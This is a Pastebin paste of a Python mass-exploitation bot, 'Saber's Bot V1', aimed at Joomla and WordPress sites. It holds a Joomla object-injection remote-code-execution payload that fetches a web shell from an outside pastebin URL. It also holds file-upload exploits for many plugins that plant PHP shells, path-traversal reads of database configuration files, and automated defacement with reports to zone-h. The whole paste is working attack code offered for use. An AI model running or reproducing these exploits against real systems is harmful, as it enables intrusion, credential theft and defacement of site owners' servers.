API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 4th, 2018
688
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 56.32 KB | None | 0 0
raw download clone embed print report
  1. import urllib2,sys
  2. import datetime
  3. import time, os
  4. import requests
  5. import re
  6. from multiprocessing import Pool
  7. from multiprocessing.dummy import Pool as ThreadPool
  8. logo = """
  9. _____ _ _ ____ ____ _______ __ ____
  10. / ____| | | ( ) | _ \ / __ \__ __| \ \ / /_ |
  11. | (___ __ _| |__ ___ _ __|/ ___ | |_) | | | | | | \ \ / / | |
  12. \___ \ / _` | '_ \ / _ \ '__| / __| | _ <| | | | | | \ \/ / | |
  13. ____) | (_| | |_) | __/ | \__ \ | |_) | |__| | | | \ / | |
  14. |_____/ \__,_|_.__/ \___|_| |___/ |____/ \____/ |_| \/ |_|
  15. Saber's Bot V1
  16. fallagkill3r@gmail.com
  17. https://www.facebook.com/drwxxrxrx
  18. """
  19. #results
  20. print logo
  21. print "Usage : MultiThread : "+sys.argv[0]+" -t thteads -u lists"
  22. print "Usage : SingleThread : "+sys.argv[0]+" -u lists"
  23. if not os.path.exists("results"):
  24. os.mkdir("results", 0755);
  25. if not os.path.exists("tmp"):
  26. os.mkdir("tmp", 0755);
  27. #Variables
  28. rev = 'revsaber.zip'
  29. grav = 'saber.jpg'
  30. ind = 'lol.jpg'
  31. up = 'saber.php'
  32. cher = 'saber.php'
  33. mblog = 'blog.php.xxxjpg'
  34. j1 = 'saber.php3.g'
  35. j2 = 'jdownloads.zip'
  36. zebi = 'LOL.gif'
  37. jcsh = 'saber.php'
  38. fabric = "saber.txt"
  39. terma = 'LOL.gif'
  40. ads = 'saber.jpg'
  41. asindex = 'LOL.jpg'
  42. user_agent = "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3"
  43. payload = """ fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/saber.php','w+'),file_get_contents('https://pastebin.com/raw/nmcSiKfw')); fwrite(fopen($_SERVER['DOCUMENT_ROOT']."/images/saber.php","w+"),file_get_contents("https://pastebin.com/raw/nmcSiKfw"));fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/LOL.html','w+'),' Hacked By Saber ');"""
  44. #Zone-h
  45. def zone(url) :
  46. r = requests.post("http://zone-h.com/notify/single", data={'defacer': 'fallag kill3r', 'domain1': url, 'hackmode': 1, 'reason': 1})
  47. if 'ERROR' in r.content :
  48. print color.RED+"Zone-H : ERROR"
  49. else :
  50. print color.GREEN+"Zone-H : OK"
  51. #RCE
  52. def prepare(url, ua):
  53. try:
  54. global user_agent
  55. headers = {
  56. 'User-Agent' : user_agent,
  57. 'x-forwarded-for' : ua
  58. }
  59. cookies = urllib2.Request(url, headers=headers)
  60. result = urllib2.urlopen(cookies)
  61. cookieJar = result.info().getheader('Set-Cookie')
  62. injection = urllib2.Request(url, headers=headers)
  63. injection.add_header('Cookie', cookieJar)
  64. urllib2.urlopen(injection)
  65. except:
  66. pass
  67. def toCharCode(string):
  68. try:
  69. encoded = ""
  70. for char in string:
  71. encoded += "chr({0}).".format(ord(char))
  72. return encoded[:-1]
  73. except:
  74. pass
  75. def generate(payload):
  76. php_payload = "eval({0})".format(toCharCode(payload))
  77. terminate = '\xf0\xfd\xfd\xfd';
  78. exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  79. injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
  80. exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  81. exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  82. return exploit_template
  83. def rce(url):
  84. try:
  85. global payload
  86. payload_generated = generate(payload)
  87. prepare(url, payload_generated)
  88. tester = urllib2.urlopen(url+"/saber.php").read()
  89. ww = requests.get(url+"/LOL.html")
  90. if re.findall("Saber", tester) and urllib2.urlopen(url+"/saber.php").getcode() == 200 and "Hacked" in ww.content:
  91. site = url + "/saber.php"
  92. site2 = url + "/LOL.html"
  93. print color.GREEN+"Defaced > "+site2
  94. zone(site2)
  95. print color.GREEN+"Shell uploaded > "+site
  96. with open("results/index.txt", 'a') as neo:
  97. neo.write("%s" % site2)
  98. neo.write("\n")
  99. with open("results/shells.txt", 'a') as neo:
  100. neo.write("%s" % site)
  101. neo.write("\n")
  102. except:
  103. print color.RED+"[RCE]-NOT VULUN"
  104. pass
  105. #JCE
  106. def jce(site):
  107. try :
  108. global zebi
  109. files = {'Filedata': open(zebi, 'rb')}
  110. post = {
  111. 'upload-dir': '../../',
  112. 'upload-overwrite': '0',
  113. 'action': 'upload'
  114. }
  115. url = site + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form"
  116. html = urllib2.urlopen(url).readlines()
  117. for line in html:
  118. if re.findall('No function call specified', line):
  119. req = requests.post(url,files=files, data=post)
  120. if req.status_code == 200 or 'success' in req.text:
  121. url = site+'/LOL.gif'
  122. if requests.get(url).status_code == 200:
  123. print color.BOLD+"[VULUN] "+url
  124. zone(url)
  125. with open("results/index.txt", 'a') as neo:
  126. neo.write("%s" % url)
  127. neo.write("\n")
  128. else:
  129. print color.RED+"[JCE]-NOT VULUN"
  130. except :
  131. pass
  132. def alberghi(site):
  133. try:
  134. global terma
  135. files = {'userfile': open(terma, 'rb')}
  136. url = site + "/administrator/components/com_alberghi/upload.alberghi.php"
  137. html = urllib2.urlopen(url).readlines()
  138. for line in html:
  139. if re.findall('Upload', line):
  140. req = requests.post(url,files=files)
  141. if req.status_code == 200 or 'success' in req.text:
  142. url = url.replace('/administrator/components/com_alberghi/upload.alberghi.php', '/administrator/components/com_alberghi/' + terma)
  143. if urllib2.urlopen(url).getcode() == 200:
  144. print color.BOLD+"Alberghi-[VULUN] => "+url
  145. zone(url)
  146. with open("results/index.txt", 'a') as neo:
  147. neo.write("%s" % url)
  148. neo.write("\n")
  149. except:
  150. print color.RED+"[AlBerghi]-NOT VULUN"
  151. pass
  152. def jceshell(site):
  153. try:
  154. global jcsh
  155. files = {'Filedata': open(jcsh, 'rb')}
  156. post = {
  157. 'upload-dir': '../../',
  158. 'upload-overwrite': '0',
  159. 'action': 'upload'
  160. }
  161. url = site + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form"
  162. req = requests.post(url,files=files, data=post)
  163. if req.status_code == 200 or 'success' in req.text:
  164. url = url.replace('/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form', '/' + jcsh)
  165. openbing = urllib2.urlopen(url)
  166. readbing = openbing.read()
  167. if re.findall("Saber", readbing):
  168. print color.BOLD+"[JCE_SHELL]-VULUN >",url
  169. with open("results/shells.txt", 'a') as neo:
  170. neo.write("%s" % url)
  171. neo.write("\n")
  172. except:
  173. print color.RED+"[JCE Shell]-NOT VULUN"
  174. def adsmanager(site):
  175. try:
  176. global ads
  177. files = {'file': open(ads, 'rb')}
  178. post = {
  179. "name": "saber.php"
  180. }
  181. url = site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  182. html = urllib2.urlopen(url).readlines()
  183. for line in html:
  184. if re.findall("jsonrpc", line):
  185. req = requests.post(url, files=files, data=post)
  186. if req.status_code == 200 or 'success' in req.text:
  187. url = url.replace('/index.php?option=ads&task=upload&tmpl=component',
  188. '/tmp/plupload/' + ads)
  189. openbing = urllib2.urlopen(url)
  190. readbing = openbing.read()
  191. if re.findall("Saber", readbing):
  192. print color.BOLD+"[AdsManager]-VULUN > "+url
  193. with open("results/shells.txt", 'a') as neo:
  194. neo.write("%s" % url)
  195. neo.write("\n")
  196. except:
  197. print color.RED+"[AdsManager Shell]-NOT VULUN"
  198. pass
  199. def adsindex(site):
  200. try:
  201. global asindex
  202. files = {'file': open(asindex, 'rb')}
  203. post = {
  204. "name": "LOL.html"
  205. }
  206. url = site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  207. html = urllib2.urlopen(url).readlines()
  208. for line in html:
  209. if re.findall("jsonrpc", line):
  210. req = requests.post(url, files=files, data=post)
  211. if req.status_code == 200 or 'success' in req.text:
  212. url = url.replace('/index.php?option=com_adsmanager&task=upload&tmpl=component',
  213. '/tmp/plupload/' + asindex)
  214. openbing = urllib2.urlopen(url)
  215. readbing = openbing.read()
  216. if re.findall("Saber", readbing):
  217. print color.BOLD+"[AdsManager_Index]-VULUN > "+url
  218. with open("results/index.txt", 'a') as neo:
  219. neo.write("%s" % url)
  220. neo.write("\n")
  221.  
  222. except:
  223. print color.RED+"[AdsManager Index]-NOT VULUN"
  224. pass
  225. def modsimplefileupload(site):
  226. Exploit = '//modules/mod_simplefileuploadv1.3/elements/udd.php'
  227. CheckVuln = requests.get(site + Exploit, timeout=5)
  228. try:
  229. files = {'file': ('saber.php', open('saber.php', 'rb'), 'multipart/form-data')}
  230. post = {
  231. "submit": "Upload"
  232. }
  233. GoT = requests.post(site + Exploit, files=IndeXfile, data=post, timeout=5)
  234. url = site+'//modules/mod_simplefileuploadv1.3/elements/saber.php'
  235. check =requests.get(url)
  236. if 'Saber BOT V1' in check.content:
  237. print color.GREEN+"[ModSimpleFileUpload]-VULUN "+url
  238. with open("results/shells.txt", 'a') as neo:
  239. neo.write("%s" % url)
  240. neo.write("\n")
  241. else:
  242. print color.RED+"[ModSimpleFileUpload]-NOT VULUN"
  243. except:
  244. print color.RED+"[ModSimpleFileUpload]-NOT VULUN"
  245. pass
  246. def fabric_index(site):
  247. try:
  248. global fabric
  249. files = {'userfile': (fabric, open(fabric, 'rb'), 'multipart/form-data')}
  250. post = {
  251. "name": "sexy.php",
  252. "drop_data": "1",
  253. "overwrite": "1",
  254. "field_delimiter": ",",
  255. "text_delimiter": "&quot;",
  256. "option": "com_fabrik",
  257. "controller": "import",
  258. "view": "import",
  259. "task": "doimport",
  260. "Itemid": "0",
  261. "tableid": "0"
  262. }
  263. url = site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
  264. req = requests.post(url, files=files, data=post)
  265. if req.status_code == 200 or 'success' in req.text:
  266. url = url.replace('/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',
  267. '/media/' + fabric)
  268. openbing = urllib2.urlopen(url)
  269. readbing = openbing.read()
  270. if re.findall("Hacked", readbing):
  271. print color.BOLD+"[Com_Fabrik Index]-VULUN > "+url
  272. with open("results/index.txt", 'a') as neo:
  273. neo.write("%s" % url)
  274. neo.write("\n")
  275. else:
  276. print color.RED+"[Com_Fabrik]-NOT VULUN"
  277. except:
  278. pass
  279. def myblog(site):
  280. try:
  281. global mblog
  282. files = {'fileToUpload': open(mblog, 'rb')}
  283. url = site + "/index.php?option=com_myblog&task=ajaxupload"
  284. req = requests.post(url,files=files)
  285. if req.status_code == 200 or 'success' in req.text:
  286. url = url.replace('/index.php?option=com_myblog&task=ajaxupload', '/images/' + mblog)
  287. openbing = urllib2.urlopen(url)
  288. readbing = openbing.read()
  289. url2 = site + '/images/stories/' + mblog
  290. test2 = urllib2.urlopen(url2)
  291. readtest2 = test2.read()
  292. if re.findall("Saber", readbing) or re.findall("Tryag File Manager", readtest2):
  293. print color.BOLD+"[Com_MyBlog]-VULUN > "+url
  294. with open("results/shells.txt", 'a') as neo:
  295. neo.write("%s" % url)
  296. neo.write("\n")
  297. else:
  298. print color.RED+"[MyBlog]-NOT VULUN"
  299. except:
  300. pass
  301. def cckjseblod(url):
  302. try:
  303. response = urllib2.urlopen(url+"/index.php?option=com_cckjseblod&task=download&file=configuration.php")
  304. content = response.read()
  305. if content != "" and not "failed to open stream" in content and re.findall("JConfig", content):
  306. site = url + "/index.php?option=com_cckjseblod&task=download&file=configuration.php"
  307. print color.BOLD+"[cckjseblod]-VULUN > "+site
  308. with open("results/config.txt", 'a') as neo:
  309. neo.write("%s" % url)
  310. neo.write("\n")
  311. else:
  312. print color.RED+"[cckjseblod]-NOT VULUN"
  313. except urllib2.HTTPError:
  314. pass
  315. except urllib2.URLError:
  316. pass
  317. def macgallery(url):
  318. try:
  319. response = urllib2.urlopen(url+"/index.php?option=com_macgallery&view=download&albumid=../../configuration.php")
  320. content = response.read()
  321. if content != "" and not "failed to open stream" in content and re.findall("JConfig", content):
  322. site = url + "/index.php?option=com_macgallery&view=download&albumid=../../configuration.php"
  323. print color.BOLD+"[MacGallery]-VULUN > "+site
  324. with open("results/config.txt", 'a') as neo:
  325. neo.write("%s" % url)
  326. neo.write("\n")
  327. else:
  328. pass
  329. except urllib2.HTTPError:
  330. print color.RED+"[MacGallery]-NOT VULUN"
  331. pass
  332. except urllib2.URLError:
  333. pass
  334. def hdflvplayer(url):
  335. try:
  336. req = urllib2.Request(url + "/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php")
  337. response = urllib2.urlopen(req)
  338. content = response.read()
  339. if content != "" and not "failed to open stream" in content and re.findall("JConfig", content):
  340. site = url + "/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php"
  341. print color.BOLD+"[HdfVPlayer]-VULUN > "+site
  342. with open("results/config.txt", 'a') as neo:
  343. neo.write("%s" % url)
  344. neo.write("\n")
  345.  
  346. except urllib2.HTTPError:
  347. print color.RED+"[HdflVplayer]-NOT VULUN"
  348. pass
  349. except urllib2.URLError:
  350. pass
  351. #------------Wordpress-------
  352. #revgetconfig
  353. def revslidergetconfig(url):
  354. try :
  355. response = urllib2.urlopen(url+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
  356. r = requests.get(url+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
  357. html = response.read()
  358. if "DB" in html:
  359. print color.BOLD+"[Revslider Get Config]-VULUN > "+site
  360. with open("results/index.txt", 'a') as neo:
  361. neo.write("%s" % site)
  362. neo.write("\n")
  363. else:
  364. print color.RED+"[revslidergetconfig]-NOT VULUN"
  365. except :
  366. pass
  367. #addblockurl
  368. def addblockurl(url):
  369. global up
  370. try :
  371. ShellFile = {'popimg': open('saber.php', 'rb')}
  372. poc = url+'/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
  373. rep = requests.post(url, files=ShellFile)
  374. now = datetime.datetime.now()
  375. new = url+'/wp-content/uploads/'+str(now.year)+'/0'+str(now.month)+'/'+'saber.php'
  376. w = requests.get(new)
  377. if 'Saber BOT V1' in w.content :
  378. print color.BOLD+"[AddBlockUrl]-VULUN > "+new
  379. with open("results/index.txt", 'a') as neo:
  380. neo.write("%s" % new)
  381. neo.write("\n")
  382. else:
  383. print color.RED+"[AddBlockUrl]-NOT VULUN"
  384. except:
  385. print color.RED+"[AddBlockUrl]-NOT VULUN"
  386. pass
  387. #cherry
  388. def cherry(url):
  389. global cher
  390. try:
  391. dirx = '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
  392. xxxxe = url + dirx
  393. files={'file':(cher, open(cher,'rb'),'multipart/form-data')}
  394. r = requests.post(xxxxe, files=files)
  395. bb = cher
  396. shelldir = '/wp-content/plugins/cherry-plugin/admin/import-export/'+bb
  397. shelled = url + shelldir
  398. openbing = urllib2.urlopen(shelled)
  399. readbing = openbing.read()
  400. if re.findall("Saber", readbing):
  401. print color.BOLD+"[Cherry Plugin]-VULUN > "+shelled
  402. save = open('results/shells.txt', 'a')
  403. save.write(shelled+'\n')
  404. save.close()
  405. except :
  406. print color.RED+"[Cherry Plugin]-NOT VULUN"
  407. pass
  408. def sexycontacoform(site):
  409. Exploit = '//wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
  410. CheckVuln = requests.get(site + Exploit, timeout=5)
  411. try:
  412. IndeXfile = {'file[]': open('saber.php', 'rb')}
  413. GoT = requests.post(site + Exploit, files=IndeXfile, timeout=5)
  414. check =requests.get(site+'//wp-content/plugins/sexy-contact-form/includes/fileupload/files/saber.php')
  415. if 'Saber BOT V1' in check.content:
  416. print color.GREEN+"[SexyContatctForm]-VULUN "+site+'//wp-content/plugins/sexy-contact-form/includes/fileupload/files/saber.php'
  417. save= open('results/shells.txt', 'a')
  418. save.write(site+'//wp-content/plugins/sexy-contact-form/includes/fileupload/files/saber.php'+'\n')
  419. save.close()
  420. else:
  421. print color.RED+"[SexyContatctForm]-NOT VULUN"
  422. except:
  423. print color.RED+"[SexyContatctForm]-NOT VULUN"
  424. pass
  425. def reflexgallery(site):
  426. files = {'qqfile': ('saber.php', open('saber.php', 'rb'), 'multipart/form-data')}
  427. post = {
  428. "dm_upload": ""
  429. }
  430. now = datetime.datetime.now()
  431. url = site + "//wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year="+str(now.year)+"&Month="+str(now.month)
  432. try :
  433. req = requests.post(url, files=files)
  434. ww = requests.get(site+'/wp-content/uploads/'+str(now.year)+'/0'+str(now.month)+'/'+'saber.php')
  435. if 'Saber BOT V1' in ww.content :
  436. print color.BOLD+site+'/wp-content/uploads/'+str(now.year)+'/0'+str(now.month)+'/'+'saber.php'
  437. save = open('results/shells.txt', 'a')
  438. save.write(site+'/wp-content/uploads/'+str(now.year)+'/0'+str(now.month)+'/'+'saber.php'+'\n')
  439. save.close()
  440. else:
  441. print color.RED+"[ReflexGallery]-Not Vulun"
  442. except :
  443. pass
  444. print color.RED+"[ReflexGallery]-Not Vulun"
  445.  
  446. def wysija(site):
  447. try:
  448. FileShell = {'my-theme': open('zebi.zip', 'rb')}
  449. PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
  450. 'page': 'GZNeFLoZAb'}
  451. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  452. url = site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
  453. GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
  454. sh =site + '/wp-content/uploads/wysija/themes/zebi/saber.php'
  455. CheckShell = requests.get(sh, timeout=5)
  456. if 'Saber BOT V1' in CheckShell.content :
  457. print color.GREEN+"[wysija]-VUlun : "+sh
  458. else:
  459. print color.RED+"[Wysija]-Not Vulun"
  460. except:
  461. print color.RED+"[Wysija]-Not Vulun"
  462. pass
  463. def wtffu(site):
  464. try :
  465. ShellFile = {'files[]': open('saber.php', 'rb')}
  466. Exploit = '//wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/'
  467. exp = site+Exploit
  468. GoT = requests.post(exp, files=ShellFile, timeout=5)
  469. if 'Saber BOT V1' in GoT.content :
  470. print color.GREEN+"[WorkTheFlow]-Vulun : "+site+'//wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/saber.php'
  471. save = open('resulst/shells.txt', 'a')
  472. save.write(site+'//wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/saber.php'+'\n')
  473. save.close()
  474. else:
  475. print color.RED+"[WorkTheFlow]-Not Vulun"
  476. except :
  477. print color.RED+"[WorkTheFlow]-Not Vulun"
  478. pass
  479. def wpshop(site):
  480. try :
  481. ShellFile = {'wpshop_file': open('saber.php', 'rb')}
  482. Exploit = '/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload/'
  483. exp = site+Exploit
  484. GoT = requests.post(exp, files=ShellFile, timeout=5)
  485. if 'Saber BOT V1' in GoT.content :
  486. print color.GREEN+"[WPShop]-Vulun"+site+'//wp-content/uploads/saber.php'
  487. save = open('resulst/shells.txt', 'a')
  488. save.write(site+'//wp-content/uploads/saber.php'+'\n')
  489. save.close()
  490. else:
  491. print color.RED+"[WPShop]-Not Vulun"
  492. except :
  493. print color.RED+"[WPShop]-Not Vulun"
  494. pass
  495. def formcaft(site):
  496. global up
  497. ww = site+'/wp-content/plugins/formcraft/file-upload/server/php/'
  498. shell = open(up, "r")
  499. payload = {"files[]" : shell}
  500. bypass = {"new_name" : "ss.php"}
  501. try :
  502. files={'file':(cher, open(up,'rb'),'multipart/form-data')}
  503. rep = requests.post(ww, data=bypass, files=payload)
  504. pp = requests.get(site+'/wp-content/plugins/formcraft/file-upload/server/php/files/saber.php')
  505. if 'Saber BOT V1' in pp.content:
  506. print color.GREEN+"[FormCat]-VULUN "+site+'/wp-content/plugins/formcraft/file-upload/server/php/files/saber.php'
  507. save= open('results/shells.txt', 'a')
  508. save.write(site+'/wp-content/plugins/formcraft/file-upload/server/php/files/saber.php'+'\n')
  509. save.close()
  510. else:
  511. print color.RED+"[FormCaft Plugin]-NOT VULUN"
  512. except :
  513. print color.RED+"[FormCaft Plugin]-NOT VULUN"
  514. pass
  515. #levo
  516.  
  517. #powerzoom
  518.  
  519. #gravity
  520. def gravindex(site):
  521. global ind
  522. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  523. fileDeface = {'file': open(ind, 'r')}
  524. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'saber.html'}
  525. url = site+'/?gf_page=upload'
  526. try :
  527. req = requests.post(url, files=fileDeface, data=post_data)
  528. if "ok" in req.content :
  529. print color.GREEN+"[Gravity Form Index]-VULUN > "+site+'//_input_3_saber.html'
  530. zone(site)
  531. save= open('results/index.txt', 'a')
  532. save.write(site+'//_input_3_saber.html'+'\n')
  533. save.close()
  534. else:
  535. print color.RED+"[Gravity Form Index]-NOT VULUN"
  536. except:
  537. pass
  538. def gravity(site):
  539. global grav
  540. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  541. fileDeface = {'file': open(grav, 'r')}
  542. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'saber.php'}
  543. url = site+'/?gf_page=upload'
  544. ww = requests.get(url)
  545. if not """ {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} """ in ww.content :
  546. print color.RED+"[GravityForm]-NOT VULUN"
  547. pass
  548. else :
  549. try :
  550. req = requests.post(url, files=fileDeface, data=post_data)
  551. if "ok" in req.content :
  552. print color.BOLD+"[Gravity Form]-VULUN > "+site+'/wp-content/uploads/_input_3_saber.php'
  553. save= open('results/shells.txt', 'a')
  554. save.write(site+'/wp-content/uploads/_input_3_saber.php'+'\n')
  555. save.close()
  556. else:
  557. print color.RED+"[Gravity Form Shell]-NOT VULUN"
  558. gravindex(site)
  559. except:
  560. pass
  561. def downloadsmanager(site):
  562. files = {'upfile': ('saber.php', open('saber.php', 'rb'), 'multipart/form-data')}
  563. post = {
  564. "dm_upload": ""
  565. }
  566. url = site + "//wp-content/plugins/downloads-manager/readme.txt"
  567. try :
  568. req = requests.post(url, files=files, data=post)
  569. ww = requests.get(site+"/wp-content/plugins/downloads-manager/upload/saber.php")
  570. if 'Saber BOT V1' in ww.content :
  571. print color.BOLD+"[VULUN]-"+site+"//wp-content/plugins/downloads-manager/upload/saber.php"
  572. save = open('results/shells.txt', 'a')
  573. save.write(site+"//wp-content/plugins/downloads-manager/upload/saber.php"+"\n")
  574. save.close()
  575. else:
  576. print color.RED+"[DownloadsManager]-Not Vulun"
  577.  
  578. except :
  579. pass
  580.  
  581. def inboundiomarketing(site):
  582. files = {'file': ('saber.php', open('saber.php', 'rb'), 'multipart/form-data')}
  583. post = {
  584. "dm_upload": ""
  585. }
  586. url = site + "//wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
  587. try :
  588. req = requests.post(url, files=files, data=post)
  589. ww = requests.get(site+"//wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/saber.php")
  590. if 'Saber BOT V1' in ww.content :
  591. print color.BOLD+site+"//wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/saber.php"
  592. save = open('results/shells.txt', 'a')
  593. save.write(site+"///wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv//saber.php"+'\n')
  594. save.close()
  595. else:
  596. print color.RED+"[InboundioMarketing]-Not Vulun"
  597. except :
  598. pass
  599.  
  600. def phpeventcalendar(site):
  601. try :
  602. ShellFile = {'files[]': open('saber.php', 'rb')}
  603. Exploit = '//wp-content/plugins/php-event-calendar/server/file-uploader/'
  604. exp = site+Exploit
  605. GoT = requests.post(exp, files=ShellFile, timeout=5)
  606. checkk = requests.get(site+'/wp-content/plugins/php-event-calendar/server/file-uploader/saber.php')
  607. if 'Saber BOT V1' in checkk.content :
  608. print color.GREEN+"[PhPCalendarEvenet]-Vulun : "+site+'/wp-content/plugins/php-event-calendar/server/file-uploader/saber.php'
  609. save = open('resulst/shells.txt', 'a')
  610. save.write(site+'/wp-content/plugins/php-event-calendar/server/file-uploader/saber.php'+'\n')
  611. save.close()
  612. else:
  613. print color.RED+"[PhpCalendarEvent]-Not Vulun"
  614. except :
  615. print color.RED+"[PhpCalendarEvent]-Not Vulun"
  616. pass
  617.  
  618. def revslider(site):
  619. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  620. Exploit = site + '/wp-admin/admin-ajax.php'
  621. data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
  622. FileShell = {'update_file': open(rev, 'rb')}
  623. CheckRevslider = requests.get(site, timeout=5)
  624. try :
  625. if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
  626. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  627. ShellCheck = requests.get(site +'/wp-content/plugins/revslider/temp/update_extract//revslider/saber.php', timeout=5)
  628. if 'Saber BOT V1' in ShellCheck.content :
  629. print "[revslider Shell]-VULUN > "+site+'//wp-content/plugins/revslider/temp/update_extract//revslider/saber.php'
  630. save= open('results/shells.txt', 'a')
  631. save.write(site+'//wp-content/plugins/revslider/temp/update_extract//revslider/saber.php'+'\n')
  632. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
  633. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  634. ShellCheck = requests.get(site +'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  635. if 'Saber BOT V1' in ShellCheck.content :
  636. print color.GREEN+site+"[Revslider Avada Shell]-VULUN > "+site+'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/saber.php'
  637. save= open('results/shells.txt', 'a')
  638. save.write(site+'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/saber.php'+'\n')
  639. elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
  640. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  641. ShellCheck = requests.get(site +'//wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  642. if 'Saber BOT V1' in ShellCheck.content :
  643. print color.GREEN+"[Revslider striking_r Shell]-VULUN > "+site+'//wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/saber.php'
  644. save= open('results/shells.txt', 'a')
  645. save.write(site+'//wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/saber.php'+'\n')
  646. elif '//wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
  647. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  648. ShellCheck = requests.get(site +'//wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  649. if 'Saber BOT V1' in ShellCheck.content :
  650. print color.GREEN+"[Revslider IncredibleWP Shell]-VULUN > "+site+'/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/saber.php'
  651. save= open('results/shells.txt', 'a')
  652. save.write(site+'//wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/saber.php'+'\n')
  653. elif '//wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
  654. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  655. ShellCheck = requests.get(site +'//wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  656. if 'Saber BOT V1' in ShellCheck.content :
  657. print color.GREEN+"[Revslider ultimatum Shell]-VULUN > "+site+'/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/saber.php'
  658. save= open('results/shells.txt', 'a')
  659. save.write(site+'//wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/saber.php'+'\n')
  660. elif '//wp-content/themes/medicate' in CheckRevslider.text.encode('utf-8'):
  661. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  662. ShellCheck = requests.get(site +'/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  663. if 'Saber BOT V1' in ShellCheck.content :
  664. print color.GREEN+"[Revslider medicate Shell]-VULUN > "+site+'/wp-content/themes/medicate/script/revslider/temp/update_extract/update_extract/saber.php'
  665. save= open('results/shells.txt', 'a')
  666. save.write(site+'//wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/saber.php'+'\n')
  667. elif '//wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
